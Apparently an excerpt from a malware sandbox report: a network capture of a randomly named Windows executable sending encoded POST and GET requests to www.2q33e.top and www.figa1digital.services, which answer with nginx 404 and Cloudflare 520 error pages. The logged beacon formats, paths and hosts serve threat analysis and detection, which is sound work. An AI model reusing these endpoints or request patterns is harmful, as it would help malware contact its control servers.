4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	50048	38.47.233.52	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:52:53.550659895 CET	10868	OUT	POST /4loa/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10302 Connection: close Host: www.2q33e.top Origin: http://www.2q33e.top Referer: http://www.2q33e.top/4loa/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 66 50 51 76 50 46 59 57 68 72 43 54 31 49 34 37 6f 6a 72 57 70 6f 6a 69 56 36 43 43 64 79 62 79 31 78 33 5a 62 45 46 6c 2b 62 59 66 67 77 63 72 48 43 78 4d 37 35 68 44 6c 4c 67 55 46 69 43 4d 51 72 6c 63 58 67 4f 61 39 6e 76 68 76 61 6f 74 78 74 30 2f 79 4f 66 34 53 75 53 6f 41 56 4e 4d 61 6c 48 66 6f 41 2b 35 57 62 34 75 53 65 4a 56 79 69 34 4b 4f 6f 6e 76 6d 6f 74 33 78 7a 43 78 6b 50 63 33 6c 47 7a 59 6d 4c 68 76 61 2f 53 74 68 66 33 6d 44 4c 4b 38 66 75 74 38 51 4f 57 72 50 36 74 74 79 39 44 76 53 4a 63 44 6b 67 64 66 34 61 51 37 47 52 67 78 41 68 55 63 53 45 37 5a 2f 32 38 57 4a 33 6b 52 42 45 56 64 79 74 78 76 78 68 54 4c 38 57 33 51 6e 71 61 56 46 76 79 4f 6b 4c 33 6b 62 36 63 75 31 76 33 57 5a 48 55 71 78 56 36 47 32 65 71 75 42 6d 67 71 6d 39 39 4d 69 65 41 2b 71 39 74 52 57 7a 54 46 6d 43 46 48 37 63 69 4f 76 62 44 7a 33 44 42 6f 69 6b 77 63 64 56 42 70 46 42 45 67 5a 2b 61 30 45 33 4d 6b 76 43 6e 39 52 46 38 36 53 76 36 62 76 6e 75 7a 31 57 4e 34 65 48 2b 71 73 58 34 69 [TRUNCATED] Data Ascii: fZah6=fPQvPFYWhrCT1I47ojrWpojiV6CCdyby1x3ZbEFl+bYfgwcrHCxM75hDlLgUFiCMQrlcXgOa9nvhvaotxt0/yOf4SuSoAVNMalHfoA+5Wb4uSeJVyi4KOonvmot3xzCxkPc3lGzYmLhva/Sthf3mDLK8fut8QOWrP6tty9DvSJcDkgdf4aQ7GRgxAhUcSE7Z/28WJ3kRBEVdytxvxhTL8W3QnqaVFvyOkL3kb6cu1v3WZHUqxV6G2equBmgqm99MieA+q9tRWzTFmCFH7ciOvbDz3DBoikwcdVBpFBEgZ+a0E3MkvCn9RF86Sv6bvnuz1WN4eH+qsX4iPehFG0GSdc6KEtI7FhIIoF4zyjvgHFT7AxZveYPm/3F2MsNL40tMviuzDF2aYhUFBB2z5qTgqHXAHRAxJs5rPNHNhjHxOoFoDUZG1Gsf5zea5+YRA3s0g8DHuEY/cX4dQawmgUhdawS5ETkJUXtYIbgHFU0uIduytzhsKmxRH90QXYC+2dLBvtKZzIMO+Cr3v/LSau4HbnVOwjDB9HdrE6YEA+H/JQVvesb/etu4Tf/rN+UE9DBkOOKmFXUuOBTrfSrIIdobkrnIOh8SkbBVu56fNf7/g69CseGWLwecr3FFHHdlic+c3tDMdp9Y1vRck/et8vyMA6MKwK/IfFjouaDCauSZgFCA/BKkb3jYZRuV4Yn53AWSkiwzvlmd50Ou4BWxeO+Sq1IkYR7bHhmRbYNk3u+MO8BBvxzkudmXaNIvMcsrsr/0yPH5A7N98JFwKUCRh6eGwhPGfVXaTTCSBOC5JogFDUICCuK7exVA3Ofkpi9y9Gak1ht11PJuNboXySBevzoVqB1MqwiZBSi1Y753AQZ/cHmeX9c5+1TUqzIVGQNNPqsH3UYcklYwRJHvHRDMlM9YtL4iimJ4hmaARoF879vabnpcIM61OtFWxq7EGiMc0sAoGCti5kGPPWvDzeMxr5LD1ZvYHQKqsiRLaGtZtHk9vHOisb [TRUNCATED]
Nov 11, 2024 06:52:54.352904081 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 05:52:54 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	50049	38.47.233.52	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:52:56.099350929 CET	518	OUT	GET /4loa/?42T8f=ABwh0lAHdJnXMBd&fZah6=SN4PMyo74av9+JlAjXvK/p/EMbnZZTDB5nvebkFF6pc7tGQcTkdQn496kLp0em7XFopoYz6akDPS3Yl+mttD1trTUMnQbHN5WHDpnwWuc7UyUJZMySE4MJ8= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.2q33e.top User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36
Nov 11, 2024 06:52:56.902062893 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 11 Nov 2024 05:52:56 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	50050	188.114.97.3	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:53:02.382220030 CET	802	OUT	POST /zjtq/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 202 Connection: close Host: www.figa1digital.services Origin: http://www.figa1digital.services Referer: http://www.figa1digital.services/zjtq/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 50 73 47 54 6d 50 30 55 39 36 55 78 48 57 49 62 50 44 54 44 73 75 62 62 64 72 6e 44 31 37 6e 44 59 71 71 76 44 65 66 56 52 62 50 6c 69 6b 57 57 56 6c 49 79 31 32 62 74 4d 63 32 4a 5a 44 4b 72 4f 36 2f 77 63 62 35 62 69 57 46 39 45 5a 6f 62 30 6c 64 79 70 36 63 35 34 62 53 49 77 42 4b 52 48 41 35 53 44 61 39 45 63 6f 33 4a 4a 43 34 69 39 6e 73 58 70 48 4b 36 32 6c 75 6e 54 59 7a 65 32 50 38 6d 62 62 6b 6e 57 39 47 49 50 51 32 32 43 4f 7a 68 68 52 2b 76 34 6d 4a 65 33 68 31 64 33 39 63 49 79 52 68 64 56 64 51 42 6f 77 6c 39 42 41 43 4b 67 44 59 64 73 51 2b 5a 61 35 6a 4b 5a 67 3d 3d Data Ascii: fZah6=PsGTmP0U96UxHWIbPDTDsubbdrnD17nDYqqvDefVRbPlikWWVlIy12btMc2JZDKrO6/wcb5biWF9EZob0ldyp6c54bSIwBKRHA5SDa9Eco3JJC4i9nsXpHK62lunTYze2P8mbbknW9GIPQ22COzhhR+v4mJe3h1d39cIyRhdVdQBowl9BACKgDYdsQ+Za5jKZg==
Nov 11, 2024 06:53:02.821063042 CET	1236	IN	HTTP/1.1 520 Date: Mon, 11 Nov 2024 05:53:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 7242 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qQFNwvnsdm6Hx9LNsc%2B7hqRfEr0asyxiZv%2FALBxiDboTIWMkv9eJrpWRPBiPKSVk2Kp7EJPlk9h4GkasT1C6PVgkPqehSRVZltiLklZ4%2FnzujL2lOQdh1m41CtdT%2FPPNP4YmxAd2x1%2FMuc9N"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8e0c05080ffb42d4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1246&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=802&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![en
Nov 11, 2024 06:53:02.821079969 CET	212	IN	Data Raw: 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 66 69 67 61 31 64 69 67 69 74 61 6c 2e 73 65 72 76 69 63 65 73 20 7c 20 35 32 30 3a 20 57 65 62 20 73 65 72 76 65 72 20 69 73 20 72 65 74 75 72 6e 69 6e 67 20 61 Data Ascii: dif]--><head><title>www.figa1digital.services \| 520: Web server is returning an unknown error</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-
Nov 11, 2024 06:53:02.821089029 CET	1236	IN	Data Raw: 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c Data Ascii: equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" />
Nov 11, 2024 06:53:02.821100950 CET	1236	IN	Data Raw: 31 2f 33 20 6d 64 3a 77 2d 66 75 6c 6c 20 70 79 2d 31 35 20 6d 64 3a 70 2d 30 20 6d 64 3a 70 79 2d 38 20 6d 64 3a 74 65 78 74 2d 6c 65 66 74 20 6d 64 3a 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 6d 64 3a 62 6f 72 64 65 72 2d 30 20 6d 64 3a 62 6f 72 Data Ascii: 1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center"> <div class="relative mb-10 md:m-0"> <span class="cf-icon-browser block
Nov 11, 2024 06:53:02.821106911 CET	1236	IN	Data Raw: 74 6f 20 6d 64 3a 72 69 67 68 74 2d 30 20 6d 64 3a 74 6f 70 2d 30 20 2d 6d 6c 2d 36 20 2d 62 6f 74 74 6f 6d 2d 34 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 61 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d Data Ascii: to md:right-0 md:top-0 -ml-6 -bottom-4"></span> </a> </div> <span class="md:block w-full truncate">Newark</span> <h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3"> <a href="https://www.cloudfl
Nov 11, 2024 06:53:02.821113110 CET	636	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 2d 32 34 30 20 6c 67 Data Ascii: </div> </div> </div> <div class="w-240 lg:w-full mx-auto mb-8 lg:px-8"> <div class="clearfix"> <div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed">
Nov 11, 2024 06:53:02.821240902 CET	1236	IN	Data Raw: 61 6c 20 6c 65 61 64 69 6e 67 2d 31 2e 33 20 6d 62 2d 34 22 3e 57 68 61 74 20 63 61 6e 20 49 20 64 6f 3f 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 33 20 63 6c 61 73 73 3d 22 74 65 78 74 Data Ascii: al leading-1.3 mb-4">What can I do?</h2> <h3 class="text-15 font-semibold mb-2">If you are a visitor of this website:</h3> <p class="mb-6">Please try again in a few minutes.</p> <h3 class="text-15 font-se
Nov 11, 2024 06:53:02.821253061 CET	1143	IN	Data Raw: 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 Data Ascii: ator sm:hidden">•</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	50051	188.114.97.3	80	2992	C:\Program Files (x86)\HoduJxrSVhBmVKNUTBJAZymQJnYtRxfaYhrbmMonlcKUblthgGdUnFMvDVznAaaKnxFuCZ\qLmzoTzSrlQuBN.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 06:53:04.931801081 CET	822	OUT	POST /zjtq/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 222 Connection: close Host: www.figa1digital.services Origin: http://www.figa1digital.services Referer: http://www.figa1digital.services/zjtq/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36 Data Raw: 66 5a 61 68 36 3d 50 73 47 54 6d 50 30 55 39 36 55 78 49 58 59 62 4e 6b 50 44 75 4f 62 55 59 72 6e 44 38 62 6e 48 59 72 57 76 44 63 79 65 51 75 66 6c 6c 41 47 57 55 6e 73 79 79 32 62 74 47 38 32 49 47 54 4b 77 4f 36 79 46 63 62 31 62 69 57 52 39 45 63 45 62 30 55 64 78 72 71 63 37 33 37 53 4b 6f 68 4b 52 48 41 35 53 44 61 70 75 63 6f 50 4a 49 7a 49 69 2b 47 73 55 33 58 4b 39 67 31 75 6e 41 49 7a 53 32 50 38 55 62 5a 51 4a 57 35 32 49 50 56 4b 32 46 61 6e 69 32 42 2b 70 32 47 49 4a 2b 54 6f 56 34 76 74 66 74 44 39 79 61 63 49 62 74 32 6f 6e 51 78 6a 64 79 44 38 75 78 58 33 74 58 36 65 44 43 72 43 45 6d 50 68 67 6b 74 31 66 4b 30 4f 44 34 77 66 4b 62 6b 51 3d Data Ascii: fZah6=PsGTmP0U96UxIXYbNkPDuObUYrnD8bnHYrWvDcyeQufllAGWUnsyy2btG82IGTKwO6yFcb1biWR9EcEb0Udxrqc737SKohKRHA5SDapucoPJIzIi+GsU3XK9g1unAIzS2P8UbZQJW52IPVK2Fani2B+p2GIJ+ToV4vtftD9yacIbt2onQxjdyD8uxX3tX6eDCrCEmPhgkt1fK0OD4wfKbkQ=
Nov 11, 2024 06:53:05.446135998 CET	1236	IN	HTTP/1.1 520 Date: Mon, 11 Nov 2024 05:53:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 7242 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YOV49SeCXjFd9qEGPy44HUFlgvaXpS16XyW0TAhEKsUs1dnxAzee9oQrrIQaZ7Ggi8yZ1bsNbU4qRR%2BkY799eBRSvuoSVrQbVmfjPECsxyoc6SIKxLM0arv%2BpvJdF1saZZW51SdzIcITK4iY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8e0c0517f9644332-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1407&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=822&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--
Nov 11, 2024 06:53:05.446157932 CET	212	IN	Data Raw: 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 66 69 67 61 31 64 69 67 69 74 61 6c 2e 73 65 72 76 69 63 65 73 20 7c 20 35 32 30 3a 20 57 65 62 20 73 65 72 76 65 72 20 69 73 20 72 65 74 75 72 6e 69 6e 67 20 61 6e 20 75 6e 6b 6e Data Ascii: ><head><title>www.figa1digital.services \| 520: Web server is returning an unknown error</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv=
Nov 11, 2024 06:53:05.446168900 CET	1236	IN	Data Raw: 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c Data Ascii: "X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" /></he
Nov 11, 2024 06:53:05.446181059 CET	1236	IN	Data Raw: 3a 77 2d 66 75 6c 6c 20 70 79 2d 31 35 20 6d 64 3a 70 2d 30 20 6d 64 3a 70 79 2d 38 20 6d 64 3a 74 65 78 74 2d 6c 65 66 74 20 6d 64 3a 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 6d 64 3a 62 6f 72 64 65 72 2d 30 20 6d 64 3a 62 6f 72 64 65 72 2d 62 20 Data Ascii: :w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center"> <div class="relative mb-10 md:m-0"> <span class="cf-icon-browser block md:hi
Nov 11, 2024 06:53:05.446192980 CET	1236	IN	Data Raw: 72 69 67 68 74 2d 30 20 6d 64 3a 74 6f 70 2d 30 20 2d 6d 6c 2d 36 20 2d 62 6f 74 74 6f 6d 2d 34 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 61 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 64 3a 62 6c 6f 63 Data Ascii: right-0 md:top-0 -ml-6 -bottom-4"></span> </a> </div> <span class="md:block w-full truncate">Newark</span> <h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3"> <a href="https://www.cloudflare.co
